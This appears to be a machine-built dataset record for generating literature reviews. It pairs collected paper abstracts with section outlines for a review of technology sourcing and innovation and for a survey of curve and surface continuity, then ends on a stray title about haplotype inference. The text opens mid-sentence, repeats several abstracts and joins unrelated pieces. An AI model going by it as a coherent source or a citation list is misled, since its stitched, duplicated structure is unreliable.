IN INTRAORGANIZATIONAL NETWORKS: EFFECTS OF NETWORK POSITION AND ABSORPTIVE CAPACITY ON BUSINESS UNIT INNOVATION AND PERFORMANCE paper_content: Inside a multiunit organization, units can learn from each other and benefit from new knowledge developed by other units. Knowledge transfer among organizational units provides opportunities for mutual learning and interunit cooperation that stimulate the creation of new knowledge and, at the same time, contribute to organizational units' ability to innovate (e.g., Kogut & Zander, 1992; Tsai & --- paper_title: R&D Alliances and Firm Performance: The Impact of Technological Diversity and Alliance Organization on Innovation paper_content: In this paper, I examine the impact of partner technological diversity and alliance organizational form on firm innovative performance. Using a sample of 463 R&D alliances in the telecommunications equipment industry, I find that alliances contribute far more to firm innovation when technological diversity is moderate, rather than low or high. 
Although this relationship holds irrespective of alliance organization, I find that hierarchical organization, such as an equity joint venture, improves firm benefits from alliances with high levels of technological diversity. Thus, alliance organizational form likely influences partner ability and incentives to share information, which affects performance. --- paper_title: INTER-TEMPORAL ECONOMIES OF SCOPE , ORGANIZATIONAL MODULARITY , AND THE DYNAMICS OF DIVERSIFICATION paper_content: The question of whether corporations add value beyond that created by individual businesses has engendered much debate in recent years. Some of this debate has focused on the pros and cons of related vs. unrelated diversification. A standard explanation of the benefits of related diversification has to do with the ability to obtain intra‐temporal economies of scope from contemporaneous sharing of resources by related businesses within the firm. In contrast, this paper deals with inter‐temporal economies of scope that firms achieve by redeploying resources and capabilities between related businesses over time, as firms exit some markets while entering others. The transfer of resources due to market exit distinguishes our treatment of inter‐temporal economies of scope from standard intra‐temporal economies of scope. In addition, these inter‐temporal economies can benefit from a decentralized and modular organizational structure. This ability to obtain inter‐temporal economies of scope via organizational modularity and recombination suggests that corporations do not necessarily need a high degree of coordination between business units in order to benefit from a strategy of related diversification. Copyright © 2004 John Wiley & Sons, Ltd. --- paper_title: Profiting from technological innovation by others: The effect of competitor patenting on firm value paper_content: Abstract In 1986, Teece proposed a seminal framework for analyzing why innovators may fail to benefit from their innovations. He argued, in part, that firms with the requisite complementary assets can often expropriate an innovator's returns especially when appropriability regimes are weak. In this paper, we explore the implications of this framework from the perspective of an incumbent firm—more precisely, of investors in that firm—facing innovation by established corporate rivals and by inventors from outside its industry. We demonstrate that the financial-market value of publicly traded firms depends on patented innovation by competitors (both established rivals and industry outsiders). Our empirical study generates three main results. First, the financial-market value of an incumbent is negatively associated with “important” patenting by outside inventors. Second, in industries characterized by weak appropriability regimes or by a strong reliance on complementary assets, this relationship is reversed: important patenting by outsiders is positively associated with the incumbent's financial-market value. Third, the effect of outsiders’ patented innovation on the focal incumbent is qualitatively different than that of established rivals’ patented innovation on the incumbent. These results are consistent with implications of Teece [Teece, D., 1986. Profiting from Innovation, Research Policy] and with recently developed models that formalize elements of his framework. More generally, these results support theories about both the market-stealing and spillover effects of innovation. 
--- paper_title: Innovation objectives, knowledge sources, and the benefits of breadth paper_content: Given the inherent risk of innovative activity. firms can improve the odds of success by pursuing multiple parallel objectives. Because innovation draws on many sources of ideas, firms also may improve their odds of successful innovation by accessing a large number of knowledge sources. In this study, we conduct one of the first firm-level statistical analyses of the impact on innovation of breadth in both innovation objectives and knowledge sources. The empirical results suggest that broader horizons with respect to innovation objectives and knowledge sources are associated with successful innovation. We do not find diminishing returns to breadth in innovation objectives, which suggests that firms may tend to search too narrowly. We interpret these results in light of well-known cognitive biases toward searching in relatively familiar domains. Copyright (C) 2009 John Wiley & Sons, Ltd. --- paper_title: Technological Innovation and Acquisitions paper_content: I examine whether technological innovation is a motivating factor in firms' acquisition decisions and how an acquisition (or an acquisition withdrawal) affects technological innovation in subsequent years. I find that firms engaging in acquisition activities are less innovative and have often experienced declines in technological innovation during the years prior to the bid. Among the bidders, the relatively more innovative ones are less likely to complete a deal. During the three years after the bid, successful bidders do not underperform matching firms, whereas failed bidders significantly underperform their nonbidding peers. I further find that formerly less innovative bidders benefit more from acquisitions. These findings suggest that technological innovation affects firms' acquisition decisions, and in turn, acquisitions help firms' innovation efforts. --- paper_title: Mergers and acquisitions: Their effect on the innovative performance of companies in high-tech industries paper_content: This study examines the post-M&A innovative performance of acquiring firms in four major high-tech sectors. Non-technological M&As appear to have a negative impact on the acquiring firm's post-M&A innovative performance. With respect to technological M&As, a large relative size of the acquired knowledge base reduces the innovative performance of the acquiring firm. The absolute size of the acquired knowledge base only has a positive effect during the first couple of years after which the effect turns around and we see a negative effect on the innovative performance of the acquiring firm. The relatedness between the acquired and acquiring firms’ knowledge bases has a curvilinear impact on the acquiring firm's innovative performance. This indicates that companies should target M&A ‘partners’ that are neither too unrelated nor too similar in terms of their knowledge base. --- paper_title: Competitors' Resource-Oriented Strategies: Acting on Competitors' Resources Through Interventions in Factor Markets and Political Markets paper_content: In this paper, we argue that we can reach a better understanding of the relationships between firm resources and competitive advantage by considering actions that firms take against their rivals' resources in factor markets and political markets. We outline market and firm characteristics that facilitate the deployment of competitors' resource-oriented strategies. 
We then argue that the effectiveness of the firm's actions on its competitors' resources depends on the competitive responses of the competitors being attacked. --- paper_title: Technological acquisitions and the innovation performance of acquiring firms: a longitudinal study paper_content: This paper examines the impact of acquisitions on the subsequent innovation performance of acquiring firms in the chemicals industry. We distinguish between technological acquisitions, acquisitions in which technology is a component of the acquired firm's assets, and nontechnological acquisitions: acquisitions that do not involve a technological component. We develop a framework relating acquisitions to firm innovation performance and develop a set of measures for quantifying the technological inputs a firm obtains through acquisitions. We find that within technological acquisitions absolute size of the acquired knowledge base enhances innovation performance, while relative size of the acquired knowledge base reduces innovation output. The relatedness of acquired and acquiring knowledge bases has a nonlinear impact on innovation output. Nontechnological acquisitions do not have a significant effect on subsequent innovation output. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: The Performance of Incumbent firms in the Face of Radical Technological Innovation paper_content: A persistent theme in the academic literature on technological innovation is that incumbent enterprises have great difficulty crossing the abyss created by a radical technological innovation and, thus, go into decline, while new entrants rise to market dominance by exploiting the new technology. However, this tendency is not universal. There are outliers in any population, and much can be learned from examining this group. Here we identify a number of factors that help to explain incumbent performance in markets shaken by a radical technological innovation. --- paper_title: The endogenous relationship between innovation and diversification, and the impact of technological resources on the form of diversification paper_content: Abstract This research has endeavoured to build on earlier research on the relationship between a firm's technological resources and the direction of its diversification, by trying to confirm the endogeneity of this relationship and by addressing the influence of innovation on the choice of the mode of diversification. Based on a sample of Spanish firms, our results suggest that innovation drives diversification, but not the reverse. The second important finding of this research is the empirical confirmation that knowledge assets are not related to the diversification mode. --- paper_title: Technological acquisitions and the innovation performance of acquiring firms: a longitudinal study paper_content: This paper examines the impact of acquisitions on the subsequent innovation performance of acquiring firms in the chemicals industry. We distinguish between technological acquisitions, acquisitions in which technology is a component of the acquired firm's assets, and nontechnological acquisitions: acquisitions that do not involve a technological component. We develop a framework relating acquisitions to firm innovation performance and develop a set of measures for quantifying the technological inputs a firm obtains through acquisitions. 
We find that within technological acquisitions absolute size of the acquired knowledge base enhances innovation performance, while relative size of the acquired knowledge base reduces innovation output. The relatedness of acquired and acquiring knowledge bases has a nonlinear impact on innovation output. Nontechnological acquisitions do not have a significant effect on subsequent innovation output. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Corporate diversification, coherence and economic performance paper_content: Within the diversification literature the concept of corporate coherence has been referred to as the ability of the firm to generate and explore synergies of various types. However, the empirical studies have insofar provided only approaches taking explicitly into account the product/market side of the phenomenon. The present paper operationalizes the concept of corporate coherence as a dynamic interconnectedness between the company's technological competencies and its downstream activities. It also provides some further empirical evidence on the widely discussed relationship between corporate diversification and performance. Specifically, it offers some (albeit rather weak) evidence that economic performance is positively influenced not by the degree of diversification per se, but by the ability of the company to increase its corporate coherence. Copyright 2004, Oxford University Press. --- paper_title: THE COMPETITIVE ADVANTAGE OF INTERCONNECTED FIRMS: AN EXTENSION OF THE RESOURCE-BASED VIEW. paper_content: In light of the increasing popularity of strategic alliances, the resource-based view is revisited and extended in order to allow for the consideration of alliance partner resources in evaluating the competitive advantage of interconnected firms. The proposed model distinguishes shared resources from non-shared resources and identifies four types of rents: (a) internal rents, (b) appropriated relational rents, (c) inbound spillover rents and (d) outbound spillover rents. The model illustrates how firm-specific, relation-specific, and partner-specific factors determine the contribution of partner resources to the rent streams that a firm can extract from its ego-network of alliances. --- paper_title: Does technological convergence imply convergence in markets? Evidence from the electronics industry paper_content: Abstract This paper uses data on new subsidiaries, acquisitions, collaborative agreements, and patents of the largest 32 US and European electronics firms during 1984–1992 to examine the relationships between technological and business diversification. We find that during the 1980s many firms focused on fewer businesses, but we find no evidence of greater technological focus. We argue that this is related to the fact that, in spite of technological convergence, electronics sectors still command highly industry- or even product-specific downstream assets. In addition, we find that business focus improved performance, but that better performance is also associated with greater technological diversification. We discuss some interpretation of this finding. --- paper_title: Corporate technology portfolios and R&D performance measures: a study of technology intensive firms paper_content: This paper examines the relations between technology portfolio strategies and five commonly used research and development (R&D) performance measures. 
Patent and financial data of 78 US-based technology companies from 1976 to 1995 were gathered and analysed to investigate how a well-managed technology portfolio can create synergy and affect R&D performance. A technology portfolio can be characterized by its composition and technology concentration. A valuable technology portfolio that consists of patents with higher average citation made and self-citation ratio can have a positive effect on firm value. Our findings suggest that large firms may enjoy advantages for technological innovation because they can exploit synergy effects of their technology portfolios. Technology concentration strategy does not work well because firms focusing on few technology fields can experience diseconomy to patents received since high-quality patents are increasingly difficult to obtain. This paper lays the groundwork for future empirical research on technology portfolio and R&D performance. --- paper_title: The Impact of Culture on the Strategy of Multinational Enterprises: Does National Origin Affect Ownership Decisions? paper_content: This paper tests the proposition that national origin affects the strategies of multinational enterprises by looking at the determinants of the choice they make between entering the United States through partially versus wholly owned subsidiaries. We pool entries into the United States made by firms based in two countries, Japan and Finland, which differ both in their cultural characteristics and in their cultural distance to the United States. After carefully controlling for the known firm and industry-level determinants of subsidiary ownership strategies, we find that cultural distance between the home base of the investor and the target country (or perhaps political risk) exerts a powerful influence on ownership of subsidiaries, but cultural characteristics of the home base do not. --- paper_title: SUBSIDIARIES AND KNOWLEDGE CREATION: THE INFLUENCE OF THE MNC AND HOST COUNTRY ON INNOVATION paper_content: This paper studies the influence of external knowledge on innovation in subsidiaries of multinational firms. The focus on subsidiaries is especially interesting since they are simultaneously embedded in two knowledge contexts: (a) the internal multinational corporation (MNC) comprised of the headquarters and other subsidiaries; and (b) an external environment of regional or host country firms. We develop hypotheses to suggest that the extent of influences of these contexts on subsidiary technological innovation depends on the characteristics of the knowledge network (technological richness and diversity) and the knowledge linkages of the subsidiary with other entities. The study uses patent citation data pertaining to innovations by foreign subsidiaries of U.S. semiconductor firms to test these hypotheses. The paper finds that (a) the technological richness of the MNC, (b) the subsidiary's knowledge linkages to host country firms, and (c) the technological diversity within the host country have a positive impact on innovation. Copyright © 2004 John Wiley & Sons, Ltd. --- paper_title: The Effect of Cultural Distance on Entry Mode Choice, International Diversification, and Mne Performance: A Meta-Analysis paper_content: Although a growing literature indicates that cultural distance – that is, differences between national cultures – is an important determinant of organizational actions and performance, both empirical and theoretical concerns abound. 
In this study, the relationships of cultural distance with entry mode choice, international diversification, and MNE performance are examined by meta-analyzing data from 66 independent samples, with cumulative sample sizes ranging from 2,255 to 24,152. Regression results failed to provide statistical evidence of significant relationships between cultural distance and entry mode choice, international diversification, and MNE performance. The examination of moderator effects, however, yielded important results. We found a strong negative association between cultural distance and entry mode choice for US-based MNEs. The cultural distance–international diversification relationship was negative for high-technology industries, while it was positive for other industries. Cultural distance also had a strong positive effect on MNE performance for developed country investments. A similar, strong positive relationship was found between cultural distance and international diversification in studies with more recent samples. Results of this study indicate that substantial additional research is needed before the role of cultural distance is fully understood. --- paper_title: An institution-based view of international business strategy: A focus on emerging economies paper_content: Leveraging the recent research interest in emerging economies, this Perspective paper argues that an institution-based view of international business (IB) strategy has emerged. It is positioned as one leg that helps sustain the “strategy tripod” (the other two legs consisting of the industry- and resource-based views). We then review four diverse areas of substantive research: (1) antidumping as entry barriers; (2) competing in and out of India; (3) growing the firm in China; and (4) governing the corporation in emerging economies. Overall, we argue that an institution-based view of IB strategy, in combination with industry- and resource-based views, will not only help sustain a strategy tripod, but also shed significant light on the most fundamental questions confronting IB, such as “What drives firm strategy and performance in IB?”Journal of International Business Studies (2008) 39, 920–936. doi:10.1057/palgrave.jibs.8400377 --- paper_title: Networks, Diversity, and Productivity: The Social Capital of Corporate R&D Teams paper_content: We argue that the debate regarding the performance implications of demographic diversity can be usefully reframed in terms of the network variables that reflect distinct forms of social capital. Scholars who are pessimistic about the performance of diverse teams base their view on the hypothesis that decreased network density--the average strength of the relationship among team members--lowers a team's capacity for coordination. The optimistic view is founded on the hypothesis that teams that are characterized by high network heterogeneity, whereby relationships on the team cut across salient demographic boundaries, enjoy an enhanced learning capability. We test each of these hypotheses directly and thereby avoid the problematic assumption that they contradict one another. Our analysis of data on the social networks, organizational tenure, and productivity of 224 corporate R&D teams indicates that both network variables help account for team productivity. These findings support a recasting of the diversity-performance debate in terms of the network processes that are more proximate to outcomes of interest. 
--- paper_title: Absorptive Capacity: A New Perspective on Learning and Innovation paper_content: Discusses the notion that the ability to exploit external knowledge is crucial to a firm's innovative capabilities. In addition, it is argued that the ability to evaluate and use outside knowledge is largely a function of the level of prior related knowledge--i.e., absorptive capacity. Prior research has shown that firms that conduct their own research and development (R&D) are better able to use information from external sources. Therefore, it is possible that the absorptive capacity of a firm is created as a byproduct of the firm's R&D investment. A simple model of firm R&D intensity is constructed in a broader context of what applied economists call the three classes of industry-level determinants of R&D intensity: demand, appropriability, and technological opportunity conditions. Several predictions are made, including the notions that absorptive capacity does have a direct effect on R&D spending and spillovers will provide a positive incentive to conduct R&D. All hypotheses are tested using cross-sectional survey data on technological opportunity and appropriability conditions--collected over the period 1975 to 1977 for 1,719 business units--in the American manufacturing sector from Levin et al. (1983, 1987) and the Federal Trade Commission's Line of Business Program data on business unit sales, transfers, and R&D expenditures. Results confirm that firms are sensitive to the characteristics of the learning environment in which they operate and that absorptive capacity does appear to be a part of a firm's decisions regarding resource allocation for innovative activity. Results also suggest that, although the analysis showing a positive effect of spillovers in two industry groups does not represent a direct test of the model, the positive absorption incentive associated with spillovers may be sufficiently strong in some cases to more than offset the negative appropriability incentive. (SFL) --- paper_title: In Search of Complementarity in the Innovation Strategy: Internal R&D and External Knowledge Acquisition paper_content: Empirical research on complementarity between organizational design decisions has traditionally focused on the question of existence of complementarity. In this paper, we take a broader approach to the issue, combining a productivity and an adoption approach, while including a search for contextual variables in the firm's strategy that affect complementarity. Analysis of contextual variables is not only interesting per se, but also improves the productivity test for the existence of complementarity. We use our empirical methodology to analyze complementarity between innovation activities: internal research and development (R&D) and external knowledge acquisition. Our results suggest that internal R&D and external knowledge acquisition are complementary innovation activities, but that the degree of complementarity is sensitive to other elements of the firm's strategic environment. We identify reliance on basic R&D (the importance of universities and research centers as an information source for the innovation process) as an important contextual variable affecting complementarity between internal and external innovation activities. --- paper_title: IS THERE COMPLEMENTARITY OR SUBSTITUTABILITY BETWEEN INTERNAL AND EXTERNAL R&D STRATEGIES?
paper_content: The mixed picture of extant research on the relationship between internal and external R&D prompts us to ask such a question: under what conditions is there complementarity or substitutability between different R&D strategies? The goal of this paper is to contribute to the empirical literature by advancing and testing the contingency of the relationship between internal and external R&D strategies in shaping firms‘ innovative output. Using a panel sample of incumbent pharmaceutical firms covering the period 1986-2000, our empirical analysis suggests that the level of in-house R&D investments, which is characterized by decreasing marginal returns, is a contingency variable that critically influences the nature of the link between internal and external R&D strategies. In particular, internal R&D and external R&D, through either R&D alliances or R&D acquisitions, turn out to be complementary innovation activities at higher levels of in-house R&D investments, whereas at lower levels of in-house R&D efforts internal and external R&D are substitutive strategic options. These findings are robust to alternative specifications and estimation techniques, including a dynamic perspective on firm innovative performance. --- paper_title: When Do Relational Resources Matter? Leveraging Portfolio Technological Resources for Breakthrough Innovation paper_content: We examine the paradox of capabilities: although portfolio resources contribute to innovation success, and technologically capable firms have the ability to gain more such resources, firms' “competency traps” and the tension between value creation and value protection reduce benefits from portfolio resources for such firms. Results show that the quality and diversity of portfolio technological resources contribute to breakthrough innovation. The benefits are greater for firms with low internal strength and low internal diversity, thus suggesting positive synergy between portfolio and internal resources for such firms. Technologically strong firms, however, benefit from the quality of their portfolio resources when they overcome some of their competency traps. --- paper_title: Towards an open R&D system: Internal R&D investment, external knowledge acquisition and innovative performance paper_content: To cope with fast-changing business environments, firms are increasingly opening up their organizational boundaries to tap into external source of knowledge. By restructuring their R&D system, firms face the challenge of balancing internal and external R&D activities to profit from external knowledge. This paper examines the influence of R&D configuration on innovative performance and the moderating role of a firm's R&D capacity. --- paper_title: Innovation Management Measurement: A Review paper_content: Measurement of the process of innovation is critical for both practitioners and academics, yet the literature is characterized by a diversity of approaches, prescriptions and practices that can be confusing and contradictory. Conceptualized as a process, innovation measurement lends itself to disaggregation into a series of separate studies. The consequence of this is the absence of a holistic framework covering the range of activities required to turn ideas into useful and marketable products. We attempt to address this gap by reviewing the literature pertaining to the measurement of innovation management at the level of the firm. 
Drawing on a wide body of literature, we first develop a synthesized framework of the innovation management process consisting of seven categories: inputs management, knowledge management, innovation strategy, organizational culture and structure, portfolio management, project management and commercialization. Second, we populate each category of the framework with factors empirically demonstrated to be significant in the innovation process, and illustrative measures to map the territory of innovation management measurement. The review makes two important contributions. First, it takes the difficult step of incorporating a vastly diverse literature into a single framework. Second, it provides a framework against which managers can evaluate their own innovation activity, explore the extent to which their organization is nominally innovative or whether or not innovation is embedded throughout their organization, and identify areas for improvement. --- paper_title: Measuring innovative performance: is there an advantage in using multiple indicators? paper_content: Abstract The innovative performance of companies has been studied quite extensively and for a long period of time. However, the results of many studies have not yet led to a generally accepted indicator of innovative performance or a common set of indicators. So far the variety in terms of constructs, measurements, samples, industries and countries has been substantial. This paper studies the innovative performance of a large international sample of nearly 1200 companies in four high-tech industries, using a variety of indicators. These indicators range from R&D inputs, patent counts and patent citations to new product announcements. The study establishes that a composite construct based on these four indicators clearly catches a latent variable ‘innovative performance’. However, our findings also suggest that the statistical overlap between these indicators is that strong that future research might also consider using any of these indicators to measure the innovative performance of companies in high-tech industries. --- paper_title: External technology sourcing and innovation performance in LMT sectors: An analysis based on the Taiwanese Technological Innovation Survey paper_content: This paper presents the strategies that low- and medium-technology (LMT) firms adopt to generate technological innovation and investigates the impact of these approaches on the firms' innovation performances. These analyses are based on a sample from the Taiwanese Technological Innovation Survey totalling 753 LMT firms. The descriptive statistics show that about 95% of the firms acquired technology by technology licensing, while 32% of the firms engaged in R&D outsourcing. The firms in the sample acquiring external technological knowledge through collaboration with suppliers, clients, competitors, and research organizations are about 20%, 18%, 8%, and 23%, respectively. Using a moderated hierarchical regression analysis, this study reveals interesting results. First, inward technology licensing does not contribute significantly to innovation performance. Second, internal R&D investment negatively moderates the effect of R&D outsourcing on innovation performance. Third, internal R&D investment contingently impacts the different types of partners on innovation performance: by collaborating with different types of partners, firms with more internal R&D investment gain higher innovation returns than firms with fewer internal R&D activities. 
The results of this study contribute to a sharper understanding of technological innovation strategies and their effects on technological innovation performance in LMT sectors. --- paper_title: In Search of Complementarity in the Innovation Strategy: Internal R&D and External Knowledge Acquisition paper_content: Empirical research on complementarity between organizational design decisions has traditionally focused on the question of existence of complementarity. In this paper, we take a broader approach to the issue, combining a productivity and an adoption approach, while including a search for contextual variables in the firm's strategy that affect complementarity. Analysis of contextual variables is not only interesting per se, but also improves the productivity test for the existence of complementarity. We use our empirical methodology to analyze complementarity between innovation activities: internal research and development (R&D) and external knowledge acquisition. Our results suggest that internal R&D and external knowledge acquisition are complementary innovation activities, but that the degree of complementarity is sensitive to other elements of the firm's strategic environment. We identify reliance on basic R&D (the importance of universities and research centers as an information source for the innovation process) as an important contextual variable affecting complementarity between internal and external innovation activities. --- paper_title: The influence of corporate acquisitions on the behaviour of key inventors paper_content: The behaviour of key inventors after the acquisition of their company is examined. Key inventors are identified on the basis of their patenting output. They account for a large number of their company's high-quality patents. The analysis of 43 acquisitions shows that key inventors leave their company to a substantial extent, or they significantly reduce their patenting performance after the acquisition. Factors influencing the behaviour of key inventors after acquisitions are identified. Implications for the effective management of acquisitions as well as suggestions for further research are outlined. --- paper_title: Internationalization of innovation systems: A survey of the literature paper_content: While there is a large literature on the internationalization of economic activity (including R&D) at the corporate level, there are not many studies of the degree of internationalization of innovation systems. The few studies that exist show that national innovation systems are becoming internationalized, even if the institutions that support them remain country-specific. To the extent that the far more numerous studies of internationalization of corporate R&D discuss innovation systems at all, they point to the continued importance of national institutions to support innovative activity, even though that activity is itself becoming increasingly internationalized. © 2005 Elsevier B.V. All rights reserved. --- paper_title: COLLABORATION NETWORKS, STRUCTURAL HOLES AND INNOVATION: A LONGITUDINAL STUDY. paper_content: I find that a firm's innovation output increases with the number of collaborative linkages maintained by it, the number of structural holes it spans, and the number of partners of its partners. However, innovation is negatively related to the interaction between spanning many structural holes and having partners with many partners. --- paper_title: Dynamic capabilities: what are they?
paper_content: Seeks to present a better understanding of dynamic capabilities and the resource-based view of the firm. Dynamic capabilities are considered to be the "organizational and strategic routines by which firms achieve new resource configurations." Dynamic capabilities are identifiable and specific routines that can serve different purposes, including integrating resources, reconfiguring resources within firms, and guiding the gain and release of resources. Various examples such as the product development process and alliancing, are discussed. Commonalities related to effective dynamic capabilities can be seen across firms though this does not mean that these capabilities are exactly alike. The dynamism of the market can impact the sustainability of the dynamic capabilities and the causal ambiguity of these capabilities. Moderately dynamic markets see robust, grooved routine, while high velocity markets experience simple rules and real-knowledge creation. The evolution of these dynamic capabilities within a firm are unique but the firm's individual path is shaped by well-known learning mechanisms. Competitive advantage does not lie in the dynamic capabilities themselves but rather in the resource configurations that managers build using these dynamic capabilities. (SRD) --- paper_title: Mergers and acquisitions: Their effect on the innovative performance of companies in high-tech industries paper_content: This study examines the post-M&A innovative performance of acquiring firms in four major high-tech sectors. Non-technological M&As appear to have a negative impact on the acquiring firm's post-M&A innovative performance. With respect to technological M&As, a large relative size of the acquired knowledge base reduces the innovative performance of the acquiring firm. The absolute size of the acquired knowledge base only has a positive effect during the first couple of years after which the effect turns around and we see a negative effect on the innovative performance of the acquiring firm. The relatedness between the acquired and acquiring firms’ knowledge bases has a curvilinear impact on the acquiring firm's innovative performance. This indicates that companies should target M&A ‘partners’ that are neither too unrelated nor too similar in terms of their knowledge base. --- paper_title: Toward a knowledge‐based theory of the firm paper_content: Given assumptions about the characteristics of knowledge and the knowledge requirements of production, the firm is conceptualized as an institution for integrating knowledge. The primary contribution of the paper is in exploring the coordination mechanisms through which firms integrate the specialist knowledge of their members. In contrast to earlier literature, knowledge is viewed as residing within the individual, and the primary role of the organization is knowledge application rather than knowledge creation. The resulting theory has implications for the basis of organizational capability, the principles of organization design (in particular, the analysis of hierarchy and the distribution of decision-making authority), and the determinants of the horizontal and vertical boundaries of the firm. More generally, the knowledge-based approach sheds new light upon current organizational innovations and trends and has far-reaching implications for management practice. ---
Title: The impact of internal and external technology sourcing on innovation performance: a review and research agenda Section 1: Introduction Description 1: Introduce the importance of innovation performance in building a firm’s competitive advantage and the roles of internal and external technology sourcing. Section 2: Review methodology and organising framework Description 2: Explain the systematic review methodology and the framework used to organise the literature review. Section 3: Internal technology sourcing as an antecedent of innovation performance Description 3: Discuss the impact of internal technology sourcing on innovation performance, including the debates on specialization vs. diversification and decentralization vs. centralization of technological knowledge. Section 4: External technology sourcing as an antecedent of innovation performance Description 4: Examine the role of external technology sourcing, specifically strategic alliances and mergers & acquisitions, in influencing innovation performance, and the effect of absorptive capacity as a moderator. Section 5: Impact of the interplay between internal and external technology sourcing on innovation performance Description 5: Discuss the complementary nature of internal and external technology sourcing and the impacts on innovation performance. Section 6: Operational measures of concepts Description 6: Review the various indicators and measures used in empirical studies to assess internal and external technology sourcing and innovation performance. Section 7: Levels of analysis Description 7: Highlight the different levels of analysis (individual, firm, network, industry, country) in the study of innovation performance and suggest the need for multilevel approaches. Section 8: Time effect Description 8: Discuss the temporal dimension in the relationships studied, including the long-term impacts of technological sourcing strategies on innovation performance. Section 9: Directions for future research Description 9: Identify gaps and suggest future research avenues on the topics of technology relatedness, market relatedness, strategic alliances, the interaction between internal and external sourcing, and longitudinal analyses. Section 10: Conclusions Description 10: Summarize the findings of the literature review, the importance of internal and external technology sourcing, and the recommended areas for further research.
Survey of Continuities of Curves and Surfaces
6
--- paper_title: Geometric continuity of parametric curves: constructions of geometrically continuous splines paper_content: Some observations are made concerning the source and nature of shape parameters. It is then described how Bezier curve segments can be stitched together with G/sup 1/ or G/sup 2/ continuity, using geometric constructions. These constructions lead to the development of geometric constructions for quadratic G/sup 1/ and cubic G/sup 2/ Beta-splines. A geometrically continuous subclass of Catmull-Rom splines based on geometric continuity and possessing shape parameters is discussed. > --- paper_title: Geometric continuity of parametric curves: three equivalent characterizations paper_content: Some of the important basic results on geometric continuity of curves are presented in a self-contained manner. The paper covers parametric representation and smoothness, parametric continuity, reparameterization and equivalent parameterization, beta-constraints, and arc-length parameterization. > --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. --- paper_title: Computer Aided Geometric Design. paper_content: Abstract : The purpose of this contract was to develop and apply subdivision techniques to Computer Aided Geometric Design, using the conceptual key based on the theory of discrete splines in the Oslo Algorithm computational engine. The basic validity of the theory and algorithms were established by the development of new modeling, graphical, and interactive schemes based on them and also the use of many of these ideas by other researchers and the use of the published results by industry. Related new theory and algorithms were developed; the mathematical model was extended. New styles of modeling were proposed and theory and algorithms for graphics and modeling of nonrectangular surface generalizations were developed. The role of graphics in design and modeling as a tool has been considered. --- paper_title: Algebraic aspects of geometric continuity paper_content: Let C ( M , τ) denote the set of all scalar valued functions with connection matrix M at τ. We show that C ( M , τ) is closed under multiplication and division if and only if M is a reparametrization matrix. We conclude that reparametrization is the most general form of geometric continuity for which the shape parameters remain invariant under lifting and projection. We go on to show that Frenet frame continuity is also invariant under projection, even though the shape parameters are not preserved. We also investigate curves which are not smooth, but which become smooth under projection. 
--- paper_title: Curvature continuous curves and surfaces paper_content: Abstract The well-known construction of the Bezier points of a cubic spline curve or surface is generalized to curvature continuous curves and surfaces. Special examples of this kind of new splines are Nu-splines and Beta-splines. --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. --- paper_title: Explicit continuity conditions for adjacent Bézier surface patches paper_content: Abstract Liu and Hoschek recently gave necessary and sufficient conditions for G 1 -continuity of two adjacent Bezier surface patches. In this paper, not only the common edge but also the position of the tangent planes at its points are considered to be given. Then one obtains by algebraic methods explicit representations of the first order cross-boundary tangent vectors of the two patches. These methods can be extended to the G 2 case. In combination with new results of J. Hahn, a complete and explicit solution is derived for G 2 -continuity too. --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. --- paper_title: Computer Aided Geometric Design. paper_content: Abstract : The purpose of this contract was to develop and apply subdivision techniques to Computer Aided Geometric Design, using the conceptual key based on the theory of discrete splines in the Oslo Algorithm computational engine. The basic validity of the theory and algorithms were established by the development of new modeling, graphical, and interactive schemes based on them and also the use of many of these ideas by other researchers and the use of the published results by industry. Related new theory and algorithms were developed; the mathematical model was extended. New styles of modeling were proposed and theory and algorithms for graphics and modeling of nonrectangular surface generalizations were developed. The role of graphics in design and modeling as a tool has been considered. --- paper_title: Computer Aided Geometric Design. paper_content: Abstract : The purpose of this contract was to develop and apply subdivision techniques to Computer Aided Geometric Design, using the conceptual key based on the theory of discrete splines in the Oslo Algorithm computational engine. The basic validity of the theory and algorithms were established by the development of new modeling, graphical, and interactive schemes based on them and also the use of many of these ideas by other researchers and the use of the published results by industry. Related new theory and algorithms were developed; the mathematical model was extended. 
New styles of modeling were proposed and theory and algorithms for graphics and modeling of nonrectangular surface generalizations were developed. The role of graphics in design and modeling as a tool has been considered. --- paper_title: Geometric Modeling Algorithms And New Trends paper_content: --- paper_title: Scattered Data Interpolation in Three or More Variables paper_content: This is a survey of techniques for the interpolation of scattered data in three or more independent variables. It covers schemes that can be used for any number of variables as well as schemes specifically designed for three variables. Emphasis is on breadth rather than depth, but there are explicit illustrations of different techniques used in the solution of multivariate interpolation problems. ---
Title: Survey of Continuities of Curves and Surfaces Section 1: Introduction Description 1: Provide an overview of the importance of continuity in curves and surfaces, and state the purpose and structure of the paper. Section 2: Continuity of Curves Description 2: Discuss the fundamental concepts and different types of continuity (parametric, geometric, Frenet frame, tangent surface) in the context of curves. Section 3: Continuity of Surfaces Description 3: Explore the various types of continuity as applied to surfaces, including parametric and geometric continuity. Section 4: Modeling Description 4: Explain how continuity concepts apply to curve and surface modeling, including specific types of splines and patches. Section 5: Visual Aspects of Continuity Description 5: Relate the notions of continuity to visual effects in rendering, illumination models, and shading algorithms. Section 6: Conclusions Description 6: Summarize the key points of the survey, highlighting the different notions of continuity, their implications for modeling, and their relationship to rendering and perception.
An Overview of Combinatorial Methods for Haplotype Inference
19
